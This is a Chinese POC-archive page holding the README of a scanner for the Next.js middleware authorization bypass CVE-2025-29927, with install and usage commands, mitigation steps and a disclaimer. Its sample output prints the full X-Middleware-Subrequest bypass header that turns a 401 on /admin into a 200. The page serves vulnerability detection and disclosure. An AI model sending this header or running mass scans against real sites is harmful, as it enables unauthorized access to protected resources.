POC详情: 538006495b78c43a07acbba493be1aecbc2a26e4

来源
关联漏洞
标题: Next.js 安全漏洞 (CVE-2025-29927)
描述:Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞,该漏洞源于如果授权检查发生在中间件中,可能绕过授权检查。
描述
Next.js Middleware Bypass Scanne
介绍
# CVE-2025-29927

## Next.js Middleware Bypass Scanner (CVE-2025-29927)

CVE-2025-29927 is a specialized security tool for detecting the Next.js middleware bypass vulnerability (CVE-2025-29927) affecting Next.js versions 11.1.4 through 15.2.2. This critical vulnerability allows attackers to bypass security controls by sending a specially crafted HTTP header.

## About the Vulnerability

The Next.js middleware bypass vulnerability (CVE-2025-29927) allows attackers to circumvent authorization controls by sending a malicious `X-Middleware-Subrequest` header that confuses the middleware processing logic. This can lead to unauthorized access to protected resources and routes.

**CVSS Score:** 9.1 (Critical)

## Features

- Fast concurrent scanning of multiple targets
- SSL certificate verification bypass option for IP-based scanning
- Silent mode for automation and focused output
- Detailed vulnerability information (status codes, bypass headers)
- Endpoint discovery for comprehensive testing

## Installation

```bash
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927

# Install requirements
pip install -r requirements.txt
```

## Usage

```bash
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
```

### Command Line Arguments

- `-t, --target`: Single target to scan (e.g., example.com or https://example.com)
- `-f, --file`: File containing list of targets (one per line)
- `-c, --concurrency`: Number of concurrent scans (default: 5)
- `-k, --insecure`: Disable SSL certificate verification (useful for IP addresses)
- `-s, --silent`: Silent mode - only show vulnerable targets

### Examples

Scan a single target:
```bash
python CVE-2025-29927.py -t example.com
```

Scan multiple targets from a file:
```bash
python CVE-2025-29927.py -f targets.txt
```

Scan with SSL verification disabled:
```bash
python CVE-2025-29927.py -t 192.168.1.1 -k
```

Automated scanning with silent mode:
```bash
python CVE-2025-29927.py -f targets.txt -k -s
```

Scan with a custom Header:
```bash
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
```

## Output

For vulnerable targets, MiddleWay displays:
- The vulnerable endpoint
- Original status code
- Bypassed status code
- The bypass header used for successful exploitation

Example output:
```
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
  Original status: 401
  Bypassed status: 200
  Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
```

## Mitigation

To mitigate this vulnerability:
1. Upgrade to Next.js 14.2.25, 15.2.3 or later
2. If upgrading is not possible, block the `X-Middleware-Subrequest` header at your WAF or server level

## Disclaimer

This tool is provided for security research and defensive purposes only. Always obtain proper authorization before scanning any systems you don't own. The authors are not responsible for any misuse of this tool.

## License

MIT 
文件快照

[4.0K] /data/pocs/538006495b78c43a07acbba493be1aecbc2a26e4 ├── [7.4K] CVE-2025-29927.py ├── [3.0K] README.md └── [ 60] requirements.txt 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。